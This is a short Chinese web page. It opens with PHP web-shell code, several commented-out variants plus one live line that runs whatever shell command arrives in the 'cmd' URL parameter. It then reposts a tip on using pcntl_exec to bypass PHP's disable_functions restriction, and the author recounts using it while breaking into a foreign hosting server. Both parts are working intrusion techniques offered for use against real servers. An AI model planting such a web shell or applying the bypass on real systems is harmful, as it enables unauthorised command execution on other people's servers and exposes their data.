<?php /* $action = $_GET[‘cmd‘]; echo "<pre>"; system($action); echo"<pre/>" */ /* $action = $_GET[‘cmd‘]; echo"<pre>"; echo passthru($action); echo"<pre/>"; */ /* $action = $_GET[‘fuck‘]; echo"<pre>"; echo shell_exec ($action); echo"<pre/>"; */ /* $action = $_GET[‘cmd‘]; echo "<pre>"; echo `$action`; echo "<pre/>"; */ $action = $_GET[‘cmd‘]; echo "<pre>"; echo popen($action,‘r‘); echo "<pre/>"; ?>
转载:
利用pcntl_exec突破disable_functions
1、说明
pcntl是linux下的一个扩展,可以支持php的多线程操作。
pcntl_exec函数的作用是在当前进程空间执行指定程序,版本要求:PHP > 4.2.0
2、利用
在做渗透的时候被disable_functions卡住不能执行命令是家常便饭,今天在一国外虚拟主机上又被卡了,但我在执行phpinfo();的时候眼前闪过–enable-pcntl。当时我就偷笑了,没啥好说的,我一直强调渗透要细心做人做事也一样。
#exec.php <?php pcntl_exec(“/bin/bash”, array(“/tmp/b4dboy.sh”));?> #/tmp/b4dboy.sh #!/bin/bash ls -l /
时间: 2024-12-29 11:33:47